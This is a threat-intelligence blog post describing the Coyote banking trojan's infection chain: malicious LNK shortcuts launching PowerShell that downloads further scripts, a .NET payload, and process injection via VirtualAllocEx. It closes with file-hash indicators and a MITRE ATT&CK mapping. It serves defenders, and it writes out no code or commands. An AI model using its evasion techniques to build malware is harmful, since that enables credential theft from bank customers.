Coyote Banking Trojan: A Growing Threat That Targets Victims via LNK Files

Understand the Coyote Banking Trojan, a growing cyber threat using LNK files to steal sensitive financial data.

Understand the Coyote Banking Trojan, a growing cyber threat using LNK files to steal sensitive financial data.

Friday 14 March, 2025

Coyote Banking Trojan - Cyberware Hub
Coyote Banking Trojan - Cyberware Hub
Coyote Banking Trojan - Cyberware Hub

The Coyote Trojan, also known as the Coyote Banking Trojan, is a type of malware that primarily targets financial institutions and their users. Discovered in early 2024, it has expanded its reach to affect over 1,030 websites and 73 financial institutions.

This Trojan employs a stealthy approach, using LNK (shortcut) files and PowerShell commands to deliver its payload. This multi-stage infection chain helps it evade traditional antivirus solutions that mainly scan for executable files. Once deployed, the Coyote Trojan can perform various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials.

The Coyote Trojan is notable for its ability to manipulate security objects and inherit permissions, making it a sophisticated and dangerous threat in the cybersecurity landscape.

Infection Chain:

Initial Vector: LNK Files

The infection starts when the victim opens a malicious LNK (shortcut) file, triggering an embedded PowerShell command within it. 

PowerShell (.PS1) Script:

This PowerShell script connects to a server controlled by the attacker, downloading additional malicious scripts. This allows the attacker to maintain control over the infection and deliver further payloads.

The downloaded scripts perform several tasks, such as altering system settings, disabling security tools, and setting the stage for the final payload. These actions help the malware avoid detection and establish a persistent presence on the system.

Payload .NET Executable:

The .NET Framework is a software development platform developed by Microsoft, offering a wide range of libraries, tools, and runtime environments for building and running applications. It supports several programming languages, including C#, VB.NET, and F#, and is commonly used for developing Windows desktop applications, web apps, and services. The framework provides key features like memory management, security, and error handling, helping developers create efficient and scalable software. 

However, Windows malware authors also use the .NET Framework for malicious purposes, exploiting its capabilities to create harmful applications and execute malicious code.

Main Entry Point of the Malware:

VirtualAllocEX:

VirtualAllocEx is a Windows API function that allows one process to allocate memory in another process's address space. Malware creators often use VirtualAllocEx to inject malicious code into a target process’s memory, enabling execution of the payload without writing it to disk. This makes detection more difficult for traditional antivirus software.

Indicator of Compromise (IOCs): 

fd0ef425d34b56d0bc08bd93e6ecb11541bd834b9d4d417187373b17055c862e
b79f607ac9f1a713e393dd112c60cfe4400b8ed5bea0807b115d587f3acc664d
3b8a20d6bb88c8eaa0edd4f7627161ef9fa0ecf0997015c2ad52a69dc07831fe
060f349bed114cbc7986e52ec38423537883a473198741835ce782b27dc2baa0
c39adf3a591905f65e307bb6410f7dc71b78b27ccff8794bd7693c27856699f2
c2d25d9c88f68286f332ee1b0e989046c28bf5f10383990b5dcbb7d639ee21bc

MITRE ATT@CK MATRIX:

        Tactics				          Techniques.

Initial Access	       - Phishing Attachment (.LNK).
Execution              - Native API.
                         Command and Scripting Interpreter.
		                 Exploitation for Client Execution.
Persistence	           - Scripting (.PS1).
                         Windows Service.
                         Browsing Extensions.
Privilege Escalation   - Process Injection.
			             DLL Side-Loading.
                         Bypass User Account Control 
                         Access Token Manipulation.
Defense Evasion	   	   - Obfuscated files or Information.
                         Disable or Modify Tools.
                         Masquarding.
            			 Virtualization/Sandbox Evasion.
Discovery		       - Virtualization and Sandbox Evasion Technique.
                         Security Software Discovery.
                		 Application Window Discovery.
                         File and Directory Discovery.
Credential Access      - OS Credential Dumping.
                         Credentials in Registry.
Collection             - Archive Data Collection.
                         Email Collection.
                         Clipboard Data.
Command & Control	   - Non-Application Layer Protocol.
			             Application Layer Protocol.
                         Ingress Tool Transfer

Happy Hunting !!